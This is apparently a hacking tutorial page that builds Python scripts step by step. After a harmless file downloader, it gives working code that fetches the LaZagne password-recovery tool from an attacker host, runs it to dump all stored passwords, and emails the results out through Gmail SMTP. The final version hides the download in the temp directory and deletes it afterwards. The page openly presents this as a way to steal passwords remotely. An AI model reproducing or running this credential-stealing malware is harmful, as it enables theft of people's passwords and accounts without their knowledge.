DOWNLOAD_FILE
- Download files on a system.
- Once packaged properly will work on all operating systems.
- Simple but powerfull.
Can be used in many situations:
- download _file + execute_command = download_and_execute
- download_file + execute_and_report = download_execute_and_report
- ...etc
#!/usr/bin/env python import requests def download(url): get_response = requests.get(url) file_name = url.split("/")[-1] with open(file_name, "wb") as out_file: out_file.write(get_response.content) download("https://cdn.spacetelescope.org/archives/images/screen/potw1739a.jpg")
DOWNLOAD_EXECUTE_AND_REPORT
- Download files on a system.
- Execute a command that uses this file.
- Report results in our email.
- Cross multi-Platform!!
Ex: remotely steal all stored passwords on a computer!
Using the LaZagne tool:https://github.com/AlessandroZ/LaZagne
lazagne.exe --help
Use the following command to find all the passwords in the current system.
扫描二维码关注公众号,回复:
7407940 查看本文章
lazagne.exe all
Steal saved passwords remotely
#!/usr/bin/env python import requests import smtplib import subprocess def download(url): get_response = requests.get(url) file_name = url.split("/")[-1] with open(file_name, "wb") as out_file: out_file.write(get_response.content) def send_mail(email, password, message): server = smtplib.SMTP("smtp.gmail.com", 587) server.starttls() server.login(email, password) server.sendmail(email, email, message) server.quit() download("http://10.0.0.43/evil-files/lazagne.exe") result = subprocess.check_output("lazagne.exe all", shell=True) print(result.decode()) send_mail("[email protected]", "1111111", result)
Optimize the Python Script - Interacting with the file system. The evil file will be downloaded in the temp directory and removed after executed.
#!/usr/bin/env python import os import smtplib import subprocess import requests import tempfile def download(url): get_response = requests.get(url) file_name = url.split("/")[-1] with open(file_name, "wb") as out_file: out_file.write(get_response.content) def send_mail(email, password, message): server = smtplib.SMTP("smtp.gmail.com", 587) server.starttls() server.login(email, password) server.sendmail(email, email, message) server.quit() temp_directory = tempfile.gettempdir() os.chdir(temp_directory) download("http://10.0.0.43/evil-files/lazagne.exe") result = subprocess.check_output("lazagne.exe all", shell=True) print(result.decode()) send_mail("[email protected]", "1111111", result) os.remove("lazagne.exe")